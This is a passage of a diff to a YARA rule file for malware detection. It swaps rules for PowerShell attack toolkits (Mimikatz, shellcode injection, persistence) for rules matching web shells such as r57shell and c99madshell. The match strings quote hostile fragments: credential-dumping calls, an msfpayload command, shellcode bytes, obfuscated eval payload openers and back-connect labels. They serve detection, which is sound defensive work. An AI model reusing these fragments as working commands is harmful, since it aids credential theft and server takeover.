-		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
-		hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
-		hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
-		hash6 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
-		hash7 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
-		hash8 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
+		tags = ""
 
 	strings:
-		$s1 = "hWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z" fullword ascii
-		$s2 = "[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Y" fullword ascii
+		$s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
+		$s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
+		$s4 = "RAW D.O.S. COMMAND INTERFACE"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Dubnium_Sample_Sshopenssl : FILE
+rule SIGNATURE_BASE_Simattacker___Vrsion_1_0_0___Priv8_4_My_Friend_Php
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d4f2b494-47b6-5b8e-b358-30159dfb977b"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L133-L152"
+		description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "8a34f4fd-337d-5eb4-b7b7-4adb1c2b7937"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3808-L3820"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5cad6b0785e8c9627f1b9678dc6206cf36cd33ead2283f77655fdb0ea36249e9"
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+		logic_hash = "46bc4063d06b4af3e4e61e1e998d489e974e76f17363c9777b8afc39ff21f698"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
-		hash2 = "feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
-		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
-		hash4 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
-		hash5 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
-		hash6 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
+		tags = ""
 
 	strings:
-		$s1 = "sshkeypairgen.exe" fullword wide
-		$s2 = "OpenSSL: FATAL" fullword ascii
+		$s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
+		$s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+		$s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Rottenpotato_Potato : FILE
+rule SIGNATURE_BASE_Remexp_Asp
 {
 	meta:
-		description = "Detects a component of privilege escalation tool Rotten Potato - file Potato.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4a12783c-f58a-518b-a80a-f09f146304cc"
-		date = "2017-02-07"
-		modified = "2022-12-21"
-		reference = "https://github.com/foxglovesec/RottenPotato"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rottenpotato.yar#L10-L34"
+		description = "Semi-Auto-generated  - file RemExp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "900036ce-ff13-5441-bb77-906ea08a4ca0"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3821-L3833"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "79d2dfd5c2cfd12301c1924dce2ca2a2c3cc070565671c3e0cd69123d2245b1c"
-		score = 90
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+		logic_hash = "c7da9908a0252e95b47dbc8fbb36aeac1661dc464123aaca036bd51047a31584"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "59cdbb21d9e487ca82748168682f1f7af3c5f2b8daee3a09544dd58cbf51b0d5"
+		tags = ""
 
 	strings:
-		$x1 = "Potato.exe -ip <ip>" fullword wide
-		$x2 = "-enable_httpserver true -enable_spoof true" fullword wide
-		$x3 = "/C schtasks.exe /Create /TN omg /TR" fullword wide
-		$x4 = "-enable_token true -enable_dce true" fullword wide
-		$x5 = "DNS lookup succeeds - UDP Exhaustion failed!" fullword wide
-		$x6 = "DNS lookup fails - UDP Exhaustion worked!" fullword wide
-		$x7 = "\\obj\\Release\\Potato.pdb" ascii
-		$x8 = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";" fullword wide
-		$s1 = "\"C:\\Windows\\System32\\cmd.exe\" /K start" fullword wide
+		$s0 = "<title>Remote Explorer</title>"
+		$s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
+		$s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 2 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Powerup : FILE
+rule SIGNATURE_BASE_Phvayvv_Php_Php
 {
 	meta:
-		description = "Auto-generated rule - file PowerUp.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ff3eeec3-602d-5824-8a50-aed2081f49bc"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L10-L31"
+		description = "Semi-Auto-generated  - file phvayvv.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "76351a59-8f52-5110-a9b8-36edd59026df"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3834-L3846"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "64562c623de89df59d15db48990c25886c67b79ac9341cf8f21ef372057ccd85"
-		score = 80
+		hash = "35fb37f3c806718545d97c6559abd262"
+		logic_hash = "503a69a7e2c30cc82eba430082627bb93c459a95f675b968126bf4524c598863"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc65ec85dbcd49001e6037de9134086dd5559ac41ac4d1adf7cab319546758ad"
+		tags = ""
 
 	strings:
-		$s1 = "iex \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list vdir /text:vdir.name\" | % { " fullword ascii
-		$s2 = "iex \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list apppools /text:name\" | % { " fullword ascii
-		$s3 = "if ($Env:PROCESSOR_ARCHITECTURE -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBNAEQANgA0AA==')))) {" fullword ascii
-		$s4 = "C:\\Windows\\System32\\InetSRV\\appcmd.exe list vdir /text:physicalpath | " fullword ascii
-		$s5 = "if (Test-Path  (\"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe\"))" fullword ascii
-		$s6 = "if (Test-Path  (\"$Env:SystemRoot\\System32\\InetSRV\\appcmd.exe\")) {" fullword ascii
-		$s7 = "Write-Verbose \"Executing command '$Cmd'\"" fullword ascii
-		$s8 = "Write-Warning \"[!] Target service" fullword ascii
+		$s0 = "{mkdir(\"$dizin/$duzenx2\",777)"
+		$s1 = "$baglan=fopen($duzkaydet,'w');"
+		$s2 = "PHVayv 1.0"
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 4000KB and 1 of them ) or ( 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce : FILE
+rule SIGNATURE_BASE_Klasvayv_Asp
 {
 	meta:
-		description = "Auto-generated rule - file Inveigh-BruteForce.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cdc298d3-f9ac-5472-bdc9-0dc51ad91e4a"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L33-L49"
+		description = "Semi-Auto-generated  - file klasvayv.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "3ca4c20c-f879-55a0-9070-d40fc903f9ae"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3847-L3860"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b23b6ad66e054e435415464262004ead6e7ee121185d76c02110506293b3867b"
-		score = 80
+		hash = "2b3e64bf8462fc3d008a3d1012da64ef"
+		logic_hash = "eb1b11e02b075a4e7d28b77cf91ad596a85e4c697a36304ee177d46735965e75"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
+		tags = ""
 
 	strings:
-		$s1 = "Import-Module .\\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 " fullword ascii
-		$s2 = "$(Get-Date -format 's') - Attempting to stop HTTP listener\")|Out-Null" fullword ascii
-		$s3 = "Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Hostname server1" fullword ascii
+		$s1 = "set aktifklas=request.querystring(\"aktifklas\")"
+		$s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
+		$s3 = "<font color=\"#858585\">www.aventgrup.net"
+		$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 300KB and 1 of them ) or ( 2 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Shellcode : FILE
+rule SIGNATURE_BASE_R57Shell_Php_Php
 {
 	meta:
-		description = "Auto-generated rule - file Invoke-Shellcode.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "193d64b6-ffba-55fb-ab95-9c78552b8d68"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L51-L69"
+		description = "Semi-Auto-generated  - file r57shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "1f1070e8-e82c-5cae-a64a-cd5028adae97"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3861-L3874"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "03e9a8c5e45781d73fd13c331d82802a18e4255b506e896019d6f08c5a67dedf"
-		score = 80
+		hash = "d28445de424594a5f14d0fe2a7c4e94f"
+		logic_hash = "658eec4f3c463ec1a480bcb7ba995b8d81d1fb846832e569751d9f505f0fa87e"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "24abe9f3f366a3d269f8681be80c99504dea51e50318d83ee42f9a4c7435999a"
+		tags = ""
 
 	strings:
-		$s1 = "Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
-		$s2 = "Get-ProcAddress kernel32.dll OpenProcess" fullword ascii
-		$s3 = "msfpayload windows/exec CMD=\"cmd /k calc\" EXITFUNC=thread C | sed '1,6d;s/[\";]//g;s/\\\\/,0/g' | tr -d '\\n' | cut -c2- " fullword ascii
-		$s4 = "inject shellcode into" ascii
-		$s5 = "Injecting shellcode" ascii
+		$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
+		$s2 = "RusH security team"
+		$s3 = "'ru_text12' => 'back-connect"
+		$s4 = "<title>r57shell</title>"
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 90KB and 1 of them ) or ( 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Mimikatz : FILE
+rule SIGNATURE_BASE_Rst_Sql_Php_Php
 {
 	meta:
-		description = "Auto-generated rule - file Invoke-Mimikatz.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7c0252a1-fbe4-5519-949b-285073abb21f"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L71-L90"
+		description = "Semi-Auto-generated  - file rst_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3875-L3888"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0bca6245befb5183f6a45406823c45267b0a31fb0d4505606b98025f6494f2cc"
-		score = 80
+		hash = "0961641a4ab2b8cb4d2beca593a92010"
+		logic_hash = "d15cf69d9ad8683d2ac1ff09b08b0b26ecaf35df8e45bbd5c3a02c393f88cb34"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5c31a2e3887662467cfcb0ac37e681f1d9b0f135e6dfff010aae26587e03d8c8"
+		tags = ""
 
 	strings:
-		$s1 = "Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
-		$s2 = "ps | where { $_.Name -eq $ProcName } | select ProcessName, Id, SessionId" fullword ascii
-		$s3 = "privilege::debug exit" ascii
-		$s4 = "Get-ProcAddress Advapi32.dll AdjustTokenPrivileges" fullword ascii
-		$s5 = "Invoke-Mimikatz -DumpCreds" fullword ascii
-		$s6 = "| Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002" fullword ascii
+		$s0 = "C:\\tmp\\dump_"
+		$s1 = "RST MySQL"
+		$s2 = "http://rst.void.ru"
+		$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 10000KB and 1 of them ) or ( 3 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Relfectivepeinjection : FILE
+rule SIGNATURE_BASE_Wh_Bindshell_Py
 {
 	meta:
-		description = "Auto-generated rule - file Invoke-RelfectivePEInjection.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "75ceb01e-103f-55b2-8362-42d22a35a36a"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L92-L111"
+		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "b7acbfe7-fd28-5832-9af2-1c5befe4bbab"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3889-L3901"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "910b8b1dbc7306369f90eae0dfd5949347b2c41fa0eb5f590aed8e90e8db199a"
-		score = 80
+		hash = "fab20902862736e24aaae275af5e049c"
+		logic_hash = "e38a4f5c23371705f9bbf2db8e65d68074554edc1022576166e76d40e06bc039"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "510b345f821f93c1df5f90ac89ad91fcd0f287ebdabec6c662b716ec9fddb03a"
+		tags = ""
 
 	strings:
-		$x1 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)" fullword ascii
-		$x2 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local" fullword ascii
-		$x3 = "} = Get-ProcAddress Advapi32.dll OpenThreadToken" ascii
-		$x4 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local" fullword ascii
-		$s5 = "$PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll')" fullword ascii
-		$s6 = "= Get-ProcAddress Advapi32.dll AdjustTokenPrivileges" ascii
+		$s0 = "#Use: python wh_bindshell.py [port] [password]"
+		$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
+		$s3 = "#bugz: ctrl+c etc =script stoped=" fullword
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 700KB and 2 of them ) or ( all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Persistence : FILE
+rule SIGNATURE_BASE_Lurm_Safemod_On_Cgi
 {
 	meta:
-		description = "Auto-generated rule - file Persistence.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "38115391-75ac-5ba8-b31b-dcf4c66179b0"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L113-L134"
+		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "74e77260-a547-5553-8430-2620f8549f50"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3902-L3914"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bfe6b20fb712fcf7b45d0ef80075bc9a254867d2251109f377a378f887b38494"
-		score = 80
+		hash = "5ea4f901ce1abdf20870c214b3231db3"
+		logic_hash = "d308ad6cda92fa437b9a4c46cd1b97fb0138aa8d0010256bda56a64ced1c7875"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1a4dd18b481471fc25adea6a91982b7ffed1c2d393c8c17e6e542c030ac6cbd"
+		tags = ""
 
 	strings:
-		$s1 = "\"`\"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```\"root\\subscription```" ascii
-		$s2 = "}=$PROFILE.AllUsersAllHosts;${" ascii
-		$s3 = "C:\\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup" ascii
-		$s4 = "= gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture" ascii
-		$s5 = "-eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))" ascii
-		$s6 = "}=$PROFILE.CurrentUserAllHosts;${" ascii
-		$s7 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')" ascii
-		$s8 = "[System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)" fullword ascii
+		$s0 = "Network security team :: CGI Shell" fullword
+		$s1 = "#########################<<KONEC>>#####################################" fullword
+		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Mimikatz_Relfectivepeinjection : FILE
+rule SIGNATURE_BASE_C99Madshell_V2_0_Php_Php
 {
 	meta:
-		description = "Auto-generated rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e9471f95-48e1-57e0-b0be-f916c574a6a7"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L136-L162"
+		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "b0724920-dc1e-5819-a99b-618a9a7e1eca"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3915-L3925"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "220597cb76c189adc33a9ac740c8164b52743f61523898aefb7a74206b23b76b"
-		score = 80
+		hash = "d27292895da9afa5b60b9d3014f39294"
+		logic_hash = "07922511d9dfdd32f6b1f47479fca2063b773024a20dcab6f5cf4d56d66c3397"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "5c31a2e3887662467cfcb0ac37e681f1d9b0f135e6dfff010aae26587e03d8c8"
-		hash2 = "510b345f821f93c1df5f90ac89ad91fcd0f287ebdabec6c662b716ec9fddb03a"
+		tags = ""
 
 	strings:
-		$s1 = "[IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])" fullword ascii
-		$s2 = "if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)" fullword ascii
-		$s3 = "[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)" fullword ascii
-		$s4 = "Function Import-DllInRemoteProcess" fullword ascii
-		$s5 = "FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))" fullword ascii
-		$s6 = "[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)" fullword ascii
-		$s7 = "[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)" fullword ascii
-		$s8 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null" fullword ascii
-		$s9 = "::FromBase64String('RABvAG4AZQAhAA==')))" ascii
-		$s10 = "Write-Verbose \"PowerShell ProcessID: $PID\"" fullword ascii
-		$s11 = "[IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])" fullword ascii
+		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 10000KB and 3 of them ) or ( 6 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce_2 : FILE
+rule SIGNATURE_BASE_Backupsql_Php_Often_With_C99Shell
 {
 	meta:
-		description = "Auto-generated rule - from files Inveigh-BruteForce.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1319b03d-67e8-5155-8037-e3375e39f6a0"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L164-L181"
+		description = "Semi-Auto-generated  - file backupsql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3926-L3937"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5c035898a9574e2516cbc66efcf57f7380fd979c4a5099f8a0a190ad21af32c0"
-		score = 80
+		hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
+		logic_hash = "7c64e3d4e5815859c51f05cb376f72ea266b31193f3f4588526005e167ebabad"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
+		tags = ""
 
 	strings:
-		$s1 = "}.NTLMv2_file_queue[0]|Out-File ${" ascii
-		$s2 = "}.NTLMv2_file_queue.RemoveRange(0,1)" ascii
-		$s3 = "}.NTLMv2_file_queue.Count -gt 0)" ascii
-		$s4 = "}.relay_running = $false" ascii
+		$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
+		$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Powerup_2 : FILE
+rule SIGNATURE_BASE_Uploader_Php_Php
 {
 	meta:
-		description = "Auto-generated rule - from files PowerUp.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "11322a66-67d4-574b-acef-35d06e6f95f4"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L183-L202"
+		description = "Semi-Auto-generated  - file uploader.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "62aa783b-f12f-5bb5-9d96-7aee1666788b"
+		date = "2016-02-15"
